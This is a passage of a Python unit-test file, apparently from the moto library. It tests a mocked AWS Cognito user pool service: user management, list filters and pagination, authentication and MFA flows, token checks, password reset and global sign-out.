exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_admin_resend_invitation_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.false @mock_cognitoidp def test_admin_resend_invitation_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_get_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) @mock_cognitoidp def test_admin_get_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "thing", "Value": value}, {"Name": "phone_number", "Value": "+123456789"}, ], ) # verify user can be queried by email result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify user can be queried by phone number result = conn.admin_get_user(UserPoolId=user_pool_id, Username="+123456789") result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify that the generate user sub is a valid UUID v4 [user_sub] = [ attr["Value"] for attr in result["UserAttributes"] if attr["Name"] == "sub" ] uuid.UUID(user_sub) # verify user should be queried by user sub result = conn.admin_get_user(UserPoolId=user_pool_id, Username=user_sub) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") @mock_cognitoidp def test_admin_get_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_get_missing_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_get_user(): conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") result = conn.get_user(AccessToken=outputs["access_token"]) result["Username"].should.equal(outputs["username"]) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) for key, value in outputs["additional_fields"].items(): _verify_attribute(key, value) @mock_cognitoidp def test_get_user_unknown_accesstoken(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.get_user(AccessToken="n/a") err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Invalid token") @mock_cognitoidp def test_list_users(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) username_bis = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) user0_username = "user0@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=user0_username, UserAttributes=[{"Name": "phone_number", "Value": "+48555555555"}], ) # checking Filter with prefix operator result = conn.list_users(UserPoolId=user_pool_id, Filter='phone_number ^= "+48"') result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(user0_username) # empty value Filter should also be supported result = conn.list_users(UserPoolId=user_pool_id, Filter='family_name=""') result["Users"].should.have.length_of(0) @mock_cognitoidp def test_list_users_incorrect_filter(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username = foo") _assert_filter_parsing_error(exc) with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username=") _assert_filter_parsing_error(exc) def _assert_filter_parsing_error(exc): err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Error while parsing filter") @mock_cognitoidp def test_list_users_invalid_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter='custom:foo = "bar"') err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Invalid search attribute: custom:foo") @mock_cognitoidp def test_list_users_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username) def _verify_attribute(name, v): attr = [a for a in result["Users"][0]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("email", username) username_bis = "test2@uexample.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) uuid.UUID(result["Users"][0]["Username"]) _verify_attribute("email", username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) _verify_attribute("email", username_bis) @mock_cognitoidp def test_list_users_inherent_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) # create a confirmed disabled user client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] disabled_user_username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=disabled_user_username) conn.confirm_sign_up( ClientId=client_id, Username=disabled_user_username, ConfirmationCode="123456" ) conn.admin_disable_user(UserPoolId=user_pool_id, Username=disabled_user_username) # filter, filter value, response field, response field expected value - all target confirmed disabled user filters = [ ("username", disabled_user_username, "Username", disabled_user_username), ("status", "Disabled", "Enabled", False), ("cognito:user_status", "CONFIRMED", "UserStatus", "CONFIRMED"), ] for name, filter_value, response_field, response_field_expected_value in filters: result = conn.list_users( UserPoolId=user_pool_id, Filter='{}="{}"'.format(name, filter_value) ) result["Users"].should.have.length_of(1) result["Users"][0][response_field].should.equal(response_field_expected_value) @mock_cognitoidp def test_get_user_unconfirmed(): if settings.TEST_SERVER_MODE: raise SkipTest("Cant patch attributes in server mode.") conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") backend = moto.cognitoidp.models.cognitoidp_backends["us-west-2"] user_pool = backend.user_pools[outputs["user_pool_id"]] user_pool.users[outputs["username"]].status = "UNCONFIRMED" with pytest.raises(ClientError) as ex: conn.get_user(AccessToken=outputs["access_token"]) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("username") @mock_cognitoidp def test_list_users_returns_limit_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") @mock_cognitoidp def test_list_users_returns_pagination_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") next_token = result["PaginationToken"] result_2 = conn.list_users( UserPoolId=user_pool_id, Limit=max_results, PaginationToken=next_token ) result_2["Users"].should.have.length_of(max_results) result_2.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_list_users_when_limit_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = user_count + 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(user_count) result.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_admin_disable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_disable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_enable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_enable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_delete_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_admin_delete_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") def authentication_flow(conn, auth_flow): username = str(uuid.uuid4()) temporary_password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, UserAttributes=[{"Name": user_attribute_name, "Value": user_attribute_value}], ) result = conn.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow=auth_flow, AuthParameters={"USERNAME": username, "PASSWORD": temporary_password}, ) # A newly created user is forced to set a new password result["ChallengeName"].should.equal("NEW_PASSWORD_REQUIRED") result["Session"].should_not.be.none # This sets a new password and logs the user in (creates tokens) new_password = str(uuid.uuid4()) result = conn.respond_to_auth_challenge( Session=result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": new_password}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none return { "user_pool_id": user_pool_id, "client_id": client_id, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "username": username, "password": new_password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: authentication_flow(conn, auth_flow) def user_authentication_flow(conn): username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up( ClientId=client_id, Username=username, Password=password, ) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) # generating secret hash key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) refresh_token = result["AuthenticationResult"]["RefreshToken"] # add mfa token conn.associate_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], ) conn.verify_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], UserCode="123456", ) conn.set_user_mfa_preference( AccessToken=result["AuthenticationResult"]["AccessToken"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True,}, ) result = conn.initiate_auth( ClientId=client_id, AuthFlow="REFRESH_TOKEN", AuthParameters={"SECRET_HASH": secret_hash, "REFRESH_TOKEN": refresh_token,}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none # authenticate user once again this time with mfa token result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, Session=result["Session"], ChallengeName=result["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": username, "SECRET_HASH": secret_hash, }, ) return { "user_pool_id": user_pool_id, "client_id": client_id, "client_secret": client_secret, "secret_hash": secret_hash, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "refresh_token": refresh_token, "username": username, "password": password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_user_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") user_authentication_flow(conn) @mock_cognitoidp def test_token_legitimacy(): conn = boto3.client("cognito-idp", "us-west-2") path = "../../moto/cognitoidp/resources/jwks-public.json" with open(os.path.join(os.path.dirname(__file__), path)) as f: json_web_key = json.loads(f.read())["keys"][0] for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) id_token = outputs["id_token"] access_token = outputs["access_token"] client_id = outputs["client_id"] issuer = "https://cognito-idp.us-west-2.amazonaws.com/{}".format( outputs["user_pool_id"] ) id_claims = json.loads(jws.verify(id_token, json_web_key, "RS256")) id_claims["iss"].should.equal(issuer) id_claims["aud"].should.equal(client_id) id_claims["token_use"].should.equal("id") for k, v in outputs["additional_fields"].items(): id_claims[k].should.equal(v) access_claims = json.loads(jws.verify(access_token, json_web_key, "RS256")) access_claims["iss"].should.equal(issuer) access_claims["aud"].should.equal(client_id) access_claims["token_use"].should.equal("access") @mock_cognitoidp def test_change_password(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_change_password__using_custom_user_agent_header(): # https://github.com/spulec/moto/issues/3098 # As the admin_initiate_auth-method is unauthenticated, we use the user-agent header to pass in the region # This test verifies this works, even if we pass in our own user-agent header from botocore.config import Config my_config = Config(user_agent_extra="more/info", signature_version="v4") conn = boto3.client("cognito-idp", "us-west-2", config=my_config) for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_forgot_password(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] result = conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) result["CodeDeliveryDetails"]["Destination"].should.not_be.none result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_client_id(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=create_id(), Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal("Username/client id combination not found.") @mock_cognitoidp def test_forgot_password_admin_only_recovery(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "admin_only", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Contact administrator to reset password.") @mock_cognitoidp def test_forgot_password_user_with_all_recovery_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "email", "Value": "test@moto.com"}, {"Name": "phone_number", "Value": "555555555"}, ], ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("test@moto.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("555555555") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_user_or_user_without_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] user_without_attributes = str(uuid.uuid4()) nonexistent_user = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=user_without_attributes) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal(user + "@h***.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal("+*******9934") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_confirm_forgot_password_legacy(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) # Random confirmation code - opt out of verification conn.forgot_password(ClientId=client_id, Username=username) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) res = conn.forgot_password(ClientId=client_id, Username=username) confirmation_code = res["ResponseMetadata"]["HTTPHeaders"][ "x-moto-forgot-password-confirmation-code" ] confirmation_code.should.match(r"moto-confirmation-code:[0-9]{6}", re.I) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode=confirmation_code, Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification_invalid_confirmation_code(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode="moto-confirmation-code:123invalid", Password=str(uuid.uuid4()), ) err = ex.value.response["Error"] err["Code"].should.equal("ExpiredCodeException") err["Message"].should.equal("Invalid code provided, please request a code again.") @mock_cognitoidp def test_admin_user_global_sign_out(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username=result["username"], ) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Refresh Token has been revoked") @mock_cognitoidp def test_admin_user_global_sign_out_unknown_userpool(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId="n/a", Username=result["username"], ) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def 